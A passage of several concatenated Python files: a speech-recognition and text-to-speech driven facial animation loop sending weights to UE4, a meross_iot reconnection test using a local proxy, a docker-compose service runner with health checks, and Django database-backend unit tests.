output_lpc = c_lpc(output_wav)
output_data = get_weight(output_lpc)
# 赋值
weights = np.zeros((output_data.shape[0],BS_CONUNT))
# print(weights.shape)
weights[:,var_bs_index] = output_data
weights[:,const_bs_index] = const_bs_value
weights1 = np.zeros((output_data.shape[0],BS_CONUNT))
for i in range(len(bs_name_index)):
weights1[:,i] = weights[:,bs_name_index[i]]
q_output.put(weights1)
# *******************************************
import threading
from queue import Queue
class SoundAnimation:
def __init__(self,cpus = 1,input_nums = 30):
self.cpus = cpus
self.input_nums = input_nums
self.init_multiprocessing()
self.flag_start = False
def __del__(self):
if self.flag_start:
self.stop_multiprocessing()
def init_multiprocessing(self):
self.q_input = [Queue() for i in range(0, self.cpus)]
self.q_output = [Queue() for i in range(0, self.cpus)]
self.process = []
for i in range(0, self.cpus):
self.process.append(
threading.Thread(target=worker, args=(self.q_input[i], self.q_output[i], i)))
def start_multiprocessing(self):
self.flag_start = True
for i in range(0, self.cpus):
self.process[i].setDaemon(True)
self.process[i].start()
def stop_multiprocessing(self):
for i in range(0, self.cpus):
self.process[i].terminate()
def input_frames_data(self, input_date):
input_data_nums = [input_date[i:i + self.input_nums] for i in range(0, len(input_date), self.input_nums)]
self.flag_nums = len(input_data_nums)
for i in range(0, self.cpus):
self.q_input[i].put(input_data_nums[i::self.cpus])
def yield_output_data(self):
num = 0
flag_end = True
while flag_end:
for i in range(0, self.cpus):
if num == self.flag_nums:
flag_end = False
break
data_output = self.q_output[i].get()
for data in data_output:
yield data
num += 1
# *******************************************
# *******************************************
from lib.audio.api_audio import AudioRecognition
from lib.aispeech.api_aispeech import AiSpeech
from lib.aispeech.api_websocket import AiSpeechWebSocket
def main(fun_socket_send):
#**********************************************#
# token 过期时间
expireTime = aispeech.update_token()
if not aispeech.token:
print("Eerrr: get token, please wait a moment")
exit(1)
url = WSURL + aispeech.token
asr_websocket = AiSpeechWebSocket(url,request_body_json)
expireTimeSecs = 300
while True:
if expireTime < int((time.time()+expireTimeSecs)*1000):
print("getToken")
expireTime = aispeech.update_token()
if not aispeech.token:
print("Eerrr: get token, please wait a moment")
exit(1)
asr_websocket.url = WSURL + aispeech.token
time.sleep(0.01)
while ue4.RECORDING:
# 1 asr
num = 0
flag = asr_websocket.ws_asr_create_connection(timeout=20)
if not flag:
print("ERROR: Could not create connection:",url)
exit()
asr_websocket.send_ws_asr_data(send_status=1)
# Nero test
# buf = []
while ue4.RECORDING:
if info_print:
print("Recording:",num)
num += 1
buf=record.recording()
asr_websocket.send_ws_asr_data(data = buf,send_status=2)
asr_websocket.send_ws_asr_data(send_status=3)
if info_print:
print("wait get asr:")
get_time = time.time()
text = asr_websocket.get_text_from_ws_asr()
if info_print:
print("asr time:",time.time()-get_time)
r_asr_websocket = json.loads(text)
if r_asr_websocket['status'] == 200:
text_asr = r_asr_websocket['result']['asr']['text']
if text_asr:
if info_print:
print("asr:",text_asr)
print("wait get tts:")
dm_tts_time = time.time()
dm_tts = aispeech.dm_tts(url=BA_URL,text=text_asr,speaker= SPEAKER)
if info_print:
print("tts time is:",time.time()-dm_tts_time)
if dm_tts.status_code == 200:
b_wav_data = dm_tts.content
if b_wav_data:
# 4 animation
def play_audio_animation():
voice = np.frombuffer(b_wav_data[44:], dtype=np.int16)
input_data = get_audio_frames(voice)
try:
sound_animation.input_frames_data(input_data)
is_first = True
f_num = 0
f_btime = time.time()
for weight in sound_animation.yield_output_data():
f_num += 1
# f_time = time.time()
if is_first:
player.play_audio_data_thread(b_wav_data[44:])
f_btime = time.time()
is_first = False
fun_socket_send(weight)
time.sleep(SPEED_PLAY*f_num-(time.time()-f_btime))
# print(f_num,":frame:",time.time()-f_time)
except Exception as err:
print("Sound animation type error: ", err)
# break
voice_thread = threading.Thread(target=play_audio_animation)
voice_thread.setDaemon(True)
voice_thread.start()
voice_thread.join()
# end b_wav_data
# end text_asr
else:
print("ERROR:",r_asr_websocket)
# end asr
if info_print:
print("wait recording")
# end while RECORDING:
# end while True:
# *******************************************
if __name__ == "__main__":
udp_recv_handler = ue4.UdpRecvHandler(ADDR_BIND)
udp_send_handler = ue4.UdpSendHandler(ADDR_SEND)
#***************tensorflow*******************************#
player = AudioPlay()
sound_animation = SoundAnimation(CPU_Thread, CPU_Frames)
sound_animation.start_multiprocessing()
#****************aispeech******************************#
record = AudioRecognition()
aispeech = AiSpeech(productId,publicKey,secretkey,productIdChat=productIdChat)
#****************main******************************#
while True:
print("run main")
try:
main(udp_send_handler.send_handler)
except Exception as error:
print("Error Main loop:",error)
time.sleep(60)
#****************main******************************#
print("# *******************************************")
|
test_autoreconnect.py
|
import os
import time
import unittest
from threading import Event, Thread
import socks
import sys
from meross_iot.cloud.client_status import ClientStatus
from meross_iot.cloud.devices.power_plugs import GenericPlug
from meross_iot.cloud.exceptions.CommandTimeoutException import CommandTimeoutException
from meross_iot.manager import MerossManager
EMAIL = os.environ.get('MEROSS_EMAIL')
PASSWORD = os.environ.get('MEROSS_PASSWORD')
PROXY_PORT = 6001
def is_python6_or_more():
ver = sys.version_info
return ver.major >= 3 and ver.minor>=6
if is_python6_or_more():
import proxy
else:
proxy=None
class TestAutoreconnect(unittest.TestCase):
def setUp(self):
self.manager = MerossManager.from_email_and_password(meross_email=EMAIL, meross_password=PASSWORD, auto_reconnect=True)
class WorkerThread(object):
def __init__(self, device: GenericPlug):
self.device = device
self._t = Thread(target=self._run)
self.stopped = Event()
def start(self):
self._t.start()
def stop(self):
self.stopped.set()
self._t.join()
def _run(self):
while True:
try:
status = self.device.get_channel_status(0)
if status:
self.device.turn_off()
else:
self.device.turn_on()
except CommandTimeoutException:
print("Command timed out.")
pass
finally:
if self.stopped.wait(1):
break
def test_single_threaded_connection_drop(self):
if not is_python6_or_more():
self.skipTest("Cannot use proxy on python < 3.6")
# Allocate the proxy
dev = None
print("Connecting through proxy...")
with proxy.start(['--num-workers', '1', '--hostname', '127.0.0.1', '--port', str(PROXY_PORT)]):
# Configure the manager client to use the proxy
self.manager._cloud_client._mqtt_client.proxy_set(proxy_type=socks.HTTP, proxy_addr="127.0.0.1",
proxy_port=PROXY_PORT)
# Connect
self.manager.start()
self.assertTrue(self.manager._cloud_client.connection_status.check_status(ClientStatus.SUBSCRIBED))
# Wait a bit before closing the proxy. In the meanwhile, select a device to be used for testing.
devices = self.manager.get_supported_devices()
if len(devices) < 1:
self.skipTest("Could not find any device to test...")
dev = devices[0]
status = dev.get_status(force_status_refresh=True)
print("Device status: %s" % str(status))
time.sleep(5)
print("Closing the proxy to trigger disconnection")
print("Proxy closed")
try:
new_status = dev.get_status(force_status_refresh=True)
raise Exception("Device was still able to reconnect.")
except CommandTimeoutException:
print("Device is unreachable. That's ok!")
print("Reconnecting the proxy...")
with proxy.start(['--num-workers', '1', '--hostname', '127.0.0.1', '--port', str(PROXY_PORT)]):
self.manager._cloud_client.connection_status.wait_for_status(ClientStatus.SUBSCRIBED, timeout=30)
new_status = dev.get_status(force_status_refresh=True)
print("New device status: %s" % new_status)
self.manager.stop(logout=True)
def test_multithreaded_connection_drop(self):
if not is_python6_or_more():
self.skipTest("Cannot use proxy on python < 3.6")
# Allocate the proxy
workers = []
print("Connecting through proxy...")
with proxy.start(['--num-workers', '1', '--hostname', '127.0.0.1', '--port', str(PROXY_PORT)]):
# Configure the manager client to use the proxy
self.manager._cloud_client._mqtt_client.proxy_set(proxy_type=socks.HTTP, proxy_addr="127.0.0.1",
proxy_port=PROXY_PORT)
# Connect
self.manager.start()
# Start 2 workers for every plug
for p in self.manager.get_devices_by_kind(GenericPlug):
w1 = TestAutoreconnect.WorkerThread(p)
w2 = TestAutoreconnect.WorkerThread(p)
workers.append(w1)
workers.append(w2)
w1.start()
w2.start()
print("Started workers. Waiting a bit....")
time.sleep(10)
print("Dropping connection...")
self.manager._cloud_client.connection_status.wait_for_status(ClientStatus.CONNECTION_DROPPED, timeout=30)
print("Proxy has been closed. Waiting 120 seconds to trigger timeouts")
time.sleep(120)
print("Establishing connection back again...")
with proxy.start(['--num-workers', '1', '--hostname', '127.0.0.1', '--port', str(PROXY_PORT)]):
print("Proxy online again. Waiting a bit...")
time.sleep(10)
print("Stopping workers")
for w in workers:
w.stop()
print("Closing manager.")
self.manager.stop(logout=True)
def tearDown(self):
pass
|
process.py
|
# -*- coding: utf-8 -*-
import ansicolor
from contextlib import contextmanager
import getpass
import os
import psycopg2
import re
import requests
import pexpect
import signal
import socket
import subprocess
import sys
import threading
import time
from typing import Optional
from .utils import PROCESS_TERMINATED, PROCESS_NOEXIST, EXITCODE_NOT_ANTICIPATED_EXECUTION, bold
class DMExecutable:
def _get_clean_env(self):
env = os.environ.copy()
if "VIRTUAL_ENV" in env:
del env["VIRTUAL_ENV"]
env["PYTHONUNBUFFERED"] = "1"
env["DMRUNNER_USER"] = getpass.getuser()
return env
def _log(self, log_entry, log_name, attach=None):
self._logger(log_entry.strip("\r\n").strip("\n"), log_name, attach)
class DMServices(DMExecutable):
def __init__(self, logger, docker_compose_filepath, docker_arg="up", log_name="services"):
self._logger = logger
self._docker_compose_filepath = docker_compose_filepath
self._docker_arg = docker_arg
self._log_name = log_name
self._service_process = None
self._thread_process = None
self._thread_healthcheck: Optional[threading.Thread] = None
self._process_alive = threading.Event()
self._logs_finished = threading.Event()
self.run()
@staticmethod
def _get_docker_compose_command(docker_compose_filepath, docker_arg):
return ["docker-compose", "-f", docker_compose_filepath, docker_arg]
@classmethod
def build_services(cls, docker_compose_filepath):
return subprocess.call(cls._get_docker_compose_command(docker_compose_filepath, "build"))
@staticmethod
def services_healthcheck(shutdown_event, check_once=False):
"""Attempts to validate that required background services (NGINX, Elasticsearch, Postgres) are all
operational. It takes some shortcuts in doing so, but should be effective in most cases."""
healthcheck_result = {"nginx": False, "elasticsearch": False, "postgres": False}
try:
while not all(healthcheck_result.values()) and (not shutdown_event.is_set() or check_once):
# Try to connect to port 80 - assume that a successful connection means nginx is listening on port 80.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect(("localhost", 80))
healthcheck_result["nginx"] = True
except ConnectionError:
healthcheck_result["nginx"] = False
finally:
s.close()
try:
# Check ES cluster health - assume that a 200 response means ES is fine.
cluster_endpoint = requests.get("http://localhost:9200/_cluster/health")
healthcheck_result["elasticsearch"] = cluster_endpoint.status_code == 200
except (requests.exceptions.ConnectionError, AttributeError) as e:
healthcheck_result["elasticsearch"] = False
# Connect to Postgres with default parameters - assume a successful connection means postgres is up.
try:
psycopg2.connect(dbname="digitalmarketplace", user=getpass.getuser(), host="localhost").close()
healthcheck_result["postgres"] = True
except psycopg2.OperationalError:
healthcheck_result["postgres"] = False
if all(healthcheck_result.values()):
break
if check_once:
break
time.sleep(1)
except KeyboardInterrupt as e:
print(sys.exc_info())
sys.exit(EXITCODE_NOT_ANTICIPATED_EXECUTION)
return all(healthcheck_result.values()), healthcheck_result
def _run_in_thread(self):
self._service_process = subprocess.Popen(
self._get_docker_compose_command(self._docker_compose_filepath, self._docker_arg),
env=self._get_clean_env(),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
bufsize=1,
start_new_session=True,
)
self._process_alive.set()
try:
while True:
log_entry = self._service_process.stdout.readline()
clean_log_entry = ansicolor.strip_escapes(log_entry)
try:
if clean_log_entry.index("|") >= 0:
service_name = clean_log_entry[: clean_log_entry.index("|")].strip()
log_entry = re.sub(r"^[^|]+\s+\|\s+", "", clean_log_entry)
else:
service_name = self._log_name
except ValueError:
service_name = self._log_name
self._log(log_entry, log_name=service_name)
if self._service_process.poll() is not None:
log_entries = self._service_process.stdout.read().split("\n")
for log_entry in log_entries:
self._log(log_entry, log_name=service_name)
break
except (pexpect.exceptions.EOF, IOError):
pass
except Exception as e: # E.g. SIGINT from Ctrl+C on main thread; bail out
self._log("{}: {}".format(type(e), str(e)), log_name=self._log_name)
self._logs_finished.set()
def blocking_healthcheck(self, shutdown_event):
self._thread_healthcheck = threading.Thread(
target=self.services_healthcheck, args=(shutdown_event,), name="Thread-Services-HC"
)
self._thread_healthcheck.start()
self._log("Running services healthcheck ...", log_name=self._log_name)
try:
self._thread_healthcheck.join()
except KeyboardInterrupt:
# We will sent an interrupt, but if this is received before docker-compose has reached a certain point,
# the containers /may not/ be shutdown.
self._service_process.send_signal(signal.SIGINT)
raise
else:
self._log(log_entry="Services are up.", log_name=self._log_name)
def run(self):
self._thread_process = threading.Thread(target=self._run_in_thread, name="Thread-Services")
self._thread_process.start()
def wait(self, interrupt=False):
self._process_alive.wait()
if interrupt:
self._service_process.send_signal(signal.SIGINT)
returncode = self._service_process.wait()
self._logs_finished.wait()
return returncode
@contextmanager
def background_services(logger, docker_compose_filepath, clean=False):
if clean is True:
logger(bold("Destroying existing containers ..."))
services = DMServices(logger=logger, docker_compose_filepath=docker_compose_filepath, docker_arg="down")
services.wait()
shutdown_event = threading.Event()
docker_services = DMServices(logger=logger, docker_compose_filepath=docker_compose_filepath)
try:
docker_services.blocking_healthcheck(shutdown_event)
except KeyboardInterrupt as e:
shutdown_event.set()
raise e
yield
docker_services.wait(interrupt=True)
@contextmanager
def blank_context():
yield
class DMProcess(DMExecutable):
def __init__(self, app, logger, app_command):
self._thread = None
self._app = app
self._logger = logger
self._app_command = app_command
self._app_instance = None
self.run(app_command=self._app_command)
def _get_clean_env(self):
clean_env = {
"PYTHONUNBUFFERED": "1",
"DMRUNNER_USER": getpass.getuser(),
"PATH": os.environ["PATH"],
"LANG": os.environ["LANG"],
}
dm_env = {key: value for key, value in os.environ.items() if key.startswith("DM_")}
return {**clean_env, **dm_env}
def _get_command(self, app_command):
return self._app["commands"][app_command] if app_command in self._app["commands"] else app_command
def _run_in_thread(self, app_command):
self._app_instance = pexpect.spawn(
self._get_command(app_command), cwd=self._app["repo_path"], env=self._get_clean_env(), timeout=1
)
self._app["process"] = self._app_instance.pid
try:
while not self._app_instance.eof():
try:
# pexpect's pseudo-tty adds Windows-style line endings even on unix systems, so need to remove \r\n.
log_entry = self._app_instance.readline().decode("utf-8").strip("\r\n")
self._log(log_entry, log_name=self._app["name"])
except pexpect.exceptions.TIMEOUT:
if not self._app.get("attached"):
try:
self._app_instance.expect("(Pdb)", timeout=0)
log_entries = self._app_instance.before.decode("utf-8").split("\r\n")
for log_entry in log_entries:
self._log(log_entry, log_name=self._app["name"])
self._app["attached"] = True
self._log(
"Attaching to {} ...".format(self._app["name"]),
log_name=self._app["name"],
attach=True,
)
except pexpect.exceptions.TIMEOUT:
continue
except BaseException as e: # E.g. SIGINT from Ctrl+C on main thread; bail out
self._log(repr(e), log_name=self._app["name"])
if self._app["name"].endswith("-fe-build"):
self._log("Build complete for {} ".format(self._app["name"]), log_name=self._app["name"])
self._app["process"] = PROCESS_TERMINATED
def run(self, app_command):
self._app["process"] = PROCESS_NOEXIST
self._thread = threading.Thread(
target=self._run_in_thread, args=(app_command,), name="Thread-{}".format(self._app["name"])
)
self._thread.start()
def process_input(self, user_input):
self._app_instance.sendline(user_input)
if user_input.lower().strip() in ["q", "quit", "c", "con", "cont", "continue"]:
self._app["attached"] = False
self._log("Detaching from {} ...".format(self._app["name"]), log_name="manager", attach=True)
def wait(self):
try:
self._thread.join()
except KeyboardInterrupt:
self._app_instance.kill(signal.SIGINT)
self._app_instance.close()
raise
self._app_instance.close()
return self._app_instance.exitstatus
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import unicode_literals
import datetime
import re
import threading
import unittest
import warnings
from decimal import Decimal, Rounded
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import no_style
from django.db import (
DEFAULT_DB_ALIAS, DatabaseError, IntegrityError, connection, connections,
reset_queries, transaction,
)
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.postgresql import version as pg_version
from django.db.backends.signals import connection_created
from django.db.backends.utils import CursorWrapper, format_number
from django.db.models import Avg, StdDev, Sum, Variance
from django.db.models.sql.constants import CURSOR
from django.db.utils import ConnectionHandler
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, mock, override_settings,
skipIfDBFeature, skipUnlessDBFeature,
)
from django.test.utils import str_prefix
from django.utils import six
from django.utils.six.moves import range
from . import models
class DummyBackendTest(SimpleTestCase):
def test_no_databases(self):
"""
Test that empty DATABASES setting default to the dummy backend.
"""
DATABASES = {}
conns = ConnectionHandler(DATABASES)
self.assertEqual(conns[DEFAULT_DB_ALIAS].settings_dict['ENGINE'],
'django.db.backends.dummy')
with self.assertRaises(ImproperlyConfigured):
conns[DEFAULT_DB_ALIAS].ensure_connection()
@unittest.skipUnless(connection.vendor == 'oracle', "Test only for Oracle")
class OracleTests(unittest.TestCase):
def test_quote_name(self):
# Check that '%' chars are escaped for query execution.
name = '"SOME%NAME"'
quoted_name = connection.ops.quote_name(name)
self.assertEqual(quoted_name % (), name)
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
from django.db.backends.oracle.base import convert_unicode
with connection.cursor() as cursor:
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!')])
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
from django.db.backends.oracle.base import Database
with connection.cursor() as cursor:
var = cursor.var(Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
with connection.cursor() as cursor:
cursor.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join(six.text_type(x) for x in range(4000))
cursor.execute('INSERT INTO ltext VALUES (%s)', [long_str])
cursor.execute('SELECT text FROM ltext')
row = cursor.fetchone()
self.assertEqual(long_str, row[0].read())
cursor.execute('DROP TABLE ltext')
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.ensure_connection()
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
def test_order_of_nls_parameters(self):
# an 'almost right' datetime should work with configured
# NLS parameters as per #18465.
with connection.cursor() as cursor:
query = "select 1 from dual where '1936-12-29 00:00' < sysdate"
# Test that the query succeeds without errors - pre #18465 this
# wasn't the case.
cursor.execute(query)
self.assertEqual(cursor.fetchone()[0], 1)
@unittest.skipUnless(connection.vendor == 'sqlite', "Test only for SQLite")
class SQLiteTests(TestCase):
longMessage = True
def test_autoincrement(self):
"""
Check that auto_increment fields are created with the AUTOINCREMENT
keyword in order to be monotonically increasing. Refs #10164.
"""
with connection.schema_editor(collect_sql=True) as editor:
editor.create_model(models.Square)
statements = editor.collected_sql
match = re.search('"id" ([^,]+),', statements[0])
self.assertIsNotNone(match)
self.assertEqual('integer NOT NULL PRIMARY KEY AUTOINCREMENT',
match.group(1), "Wrong SQL used to create an auto-increment "
"column on SQLite")
def test_aggregation(self):
"""
#19360: Raise NotImplementedError when aggregating on date/time fields.
"""
for aggregate in (Sum, Avg, Variance, StdDev):
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('time'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('date'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('last_modified'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate,
**{'complex': aggregate('last_modified') + aggregate('last_modified')})
@unittest.skipUnless(connection.vendor == 'postgresql', "Test only for PostgreSQL")
class PostgreSQLTests(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 9.3 beta4", 90300)
self.assert_parses("PostgreSQL 9.3", 90300)
self.assert_parses("EnterpriseDB 9.3", 90300)
self.assert_parses("PostgreSQL 9.3.6", 90306)
self.assert_parses("PostgreSQL 9.4beta1", 90400)
self.assert_parses(
"PostgreSQL 9.3.1 on i386-apple-darwin9.2.2, compiled by GCC "
"i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)",
90301
)
def test_nodb_connection(self):
"""
Test that the _nodb_connection property fallbacks to the default connection
database when access to the 'postgres' database is not granted.
"""
def mocked_connect(self):
if self.settings_dict['NAME'] is None:
raise DatabaseError()
return ''
nodb_conn = connection._nodb_connection
self.assertIsNone(nodb_conn.settings_dict['NAME'])
# Now assume the 'postgres' db isn't available
with warnings.catch_warnings(record=True) as w:
with mock.patch('django.db.backends.base.base.BaseDatabaseWrapper.connect',
side_effect=mocked_connect, autospec=True):
nodb_conn = connection._nodb_connection
self.assertIsNotNone(nodb_conn.settings_dict['NAME'])
self.assertEqual(nodb_conn.settings_dict['NAME'], connection.settings_dict['NAME'])
# Check a RuntimeWarning has been emitted
self.assertEqual(len(w), 1)
self.assertEqual(w[0].message.__class__, RuntimeWarning)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 9.3"]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 90300)
def test_connect_and_rollback(self):
"""
PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back (#17062).
"""
new_connection = connection.copy()
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Invalidate timezone name cache, because the setting_changed
# handler cannot know about new_connection.
del new_connection.timezone_name
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
with self.settings(TIME_ZONE=new_tz):
new_connection.set_autocommit(False)
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
new_connection.close()
def test_connect_non_autocommit(self):
"""
The connection wrapper shouldn't believe that autocommit is enabled
after setting the time zone when AUTOCOMMIT is False (#21452).
"""
new_connection = connection.copy()
new_connection.settings_dict['AUTOCOMMIT'] = False
try:
# Open a database connection.
new_connection.cursor()
self.assertFalse(new_connection.get_autocommit())
finally:
new_connection.close()
def test_connect_isolation_level(self):
"""
Regression test for #18130 and #24318.
"""
from psycopg2.extensions import (
ISOLATION_LEVEL_READ_COMMITTED as read_committed,
ISOLATION_LEVEL_SERIALIZABLE as serializable,
)
# Since this is a django.test.TestCase, a transaction is in progress
# and the isolation level isn't reported as 0. This test assumes that
# PostgreSQL is configured with the default isolation level.
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(connection.connection.isolation_level, read_committed)
new_connection = connection.copy()
new_connection.settings_dict['OPTIONS']['isolation_level'] = serializable
try:
# Start a transaction so the isolation level isn't reported as 0.
new_connection.set_autocommit(False)
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(new_connection.connection.isolation_level, serializable)
finally:
new_connection.close()
def _select(self, val):
with connection.cursor() as cursor:
cursor.execute("SELECT %s", (val,))
return cursor.fetchone()[0]
def test_select_ascii_array(self):
a = ["awef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_select_unicode_array(self):
a = ["ᄲawef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_lookup_cast(self):
from django.db.backends.postgresql.operations import DatabaseOperations
do = DatabaseOperations(connection=None)
for lookup in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
self.assertIn('::text', do.lookup_cast(lookup))
def test_correct_extraction_psycopg2_version(self):
from django.db.backends.postgresql.base import psycopg2_version
version_path = 'django.db.backends.postgresql.base.Database.__version__'
with mock.patch(version_path, '2.6.9'):
self.assertEqual(psycopg2_version(), (2, 6, 9))
with mock.patch(version_path, '2.5.dev0'):
self.assertEqual(psycopg2_version(), (2, 5))
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
Test the custom ``django_date_trunc method``, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.date(2010, 1, 1)])
def test_django_date_extract(self):
"""
Test the custom ``django_date_extract method``, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
@override_settings(DEBUG=True)
class LastExecutedQueryTest(TestCase):
def test_last_executed_query(self):
"""
last_executed_query should not raise an exception even if no previous
query has been run.
"""
cursor = connection.cursor()
connection.ops.last_executed_query(cursor, '', ())
def test_debug_sql(self):
list(models.Reporter.objects.filter(first_name="test"))
sql = connection.queries[-1]['sql'].lower()
self.assertIn("select", sql)
self.assertIn(models.Reporter._meta.db_table, sql)
def test_query_encoding(self):
"""
Test that last_executed_query() returns an Unicode string
"""
data = models.RawData.objects.filter(raw_data=b'\x00\x46 \xFE').extra(select={'föö': 1})
sql, params = data.query.sql_with_params()
cursor = data.query.get_compiler('default').execute_sql(CURSOR)
last_sql = cursor.db.ops.last_executed_query(cursor, sql, params)
self.assertIsInstance(last_sql, six.text_type)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_no_interpolation_on_sqlite(self):
# Regression for #17158
# This shouldn't raise an exception
query = "SELECT strftime('%Y', 'now');"
connection.cursor().execute(query)
self.assertEqual(connection.queries[-1]['sql'],
str_prefix("QUERY = %(_)s\"SELECT strftime('%%Y', 'now');\" - PARAMS = ()"))
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1, 2, 3)])
self.assertRaises(Exception, cursor.executemany, query, [(1,)])
# Unfortunately, the following tests would be a good test to run on all
# backends, but it breaks MySQL hard. Until #13711 is fixed, it can't be run
# everywhere (although it would be an effective test of #13711).
class LongNameTest(TransactionTestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
the correct sequence name in last_insert_id and other places, so
check it is. Refs #8901.
"""
available_apps = ['backends']
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
def test_sequence_name_length_limits_m2m(self):
"""
An m2m save of a model with a long name and a long m2m field name
doesn't error (#8901).
"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
def test_sequence_name_length_limits_flush(self):
"""
Sequence resetting as part of a flush with model with long name and
long pk name doesn't error (#8901).
"""
# A full flush is expensive to the full test, so we dig into the
# internals to generate the likely offending SQL and run it manually
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertGreater(obj.pk, 10)
# This test needs to run outside of a transaction, otherwise closing the
# connection would implicitly rollback and cause problems during teardown.
class ConnectionCreatedSignalTest(TransactionTestCase):
available_apps = []
# Unfortunately with sqlite3 the in-memory test database cannot be closed,
# and so it cannot be re-opened during testing.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
connection.cursor()
self.assertIs(data["connection"].connection, connection.connection)
connection_created.disconnect(receiver)
data.clear()
connection.cursor()
self.assertEqual(data, {})
class EscapingChecks(TestCase):
"""
All tests in this test case are also run with settings.DEBUG=True in
